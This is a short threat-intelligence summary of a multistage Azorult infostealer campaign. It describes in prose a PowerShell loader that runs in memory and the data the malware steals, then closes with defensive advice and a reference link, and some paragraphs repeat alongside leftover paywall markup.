Summary:
Azorult, a notorious information-stealing malware initially identified in 2016, continues to pose a significant threat in the cybersecurity landscape. Functioning as both an information gatherer and a downloader for additional malware families, Azorult has recently been observed in a sophisticated multistage campaign. This campaign involves the use of obfuscated PowerShell scripts and memory-based execution, allowing the malware to operate without leaving traces on the disk, thus evading detection by traditional security solutions. The malware, originally available on Russian underground forums, has evolved over time, demonstrating a high level of complexity.[/subscribe_to_unlock_form]
Summary:
Azorult, a notorious information-stealing malware initially identified in 2016, continues to pose a significant threat in the cybersecurity landscape. Functioning as both an information gatherer and a downloader for additional malware families, Azorult has recently been observed in a sophisticated multistage campaign. This campaign involves the use of obfuscated PowerShell scripts and memory-based execution, allowing the malware to operate without leaving traces on the disk, thus evading detection by traditional security solutions. The malware, originally available on Russian underground forums, has evolved over time, demonstrating a high level of complexity.[emaillocker id="1283"]
The Azorult campaign unfolds in a series of stages, starting with a zip file containing a malicious shortcut file disguised as a PDF document. The shortcut file, housing an obfuscated PowerShell script, orchestrates the download and execution of a loader in memory. This loader, in turn, initiates a cascade of actions, including the retrieval of additional PowerShell scripts from a remote server, anti-virtual machine checks, and the creation of a scheduled task. The loader's ultimate goal is to communicate with command-and-control servers, extract configuration data, and download the final Azorult payload. The payload, a 32-bit Azorult .Net executable, exhibits a range of malicious activities, from system information gathering to targeting crypto wallets, browsers, and various applications. The entire process is carefully orchestrated to occur in memory, avoiding detection by security solutions.
Azorult's complexity and adaptability underscore the ongoing threat it poses to cybersecurity. The campaign's use of advanced techniques, such as obfuscation, memory-based execution, and anti-analysis checks, makes it a formidable adversary. The malware's ability to extract sensitive information, including crypto wallets and login credentials, raises concerns about the potential impact on compromised systems. To mitigate the risk associated with Azorult, users are advised to exercise caution when downloading software, verify website legitimacy, deploy robust antivirus solutions, and employ security best practices, including strong passwords and regular data backups. The continuous evolution of Azorult emphasizes the need for cybersecurity measures to stay vigilant and proactive in countering emerging threats.
Threat Profile:
References:
The following reports contain further technical details:
https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/
[/emaillocker]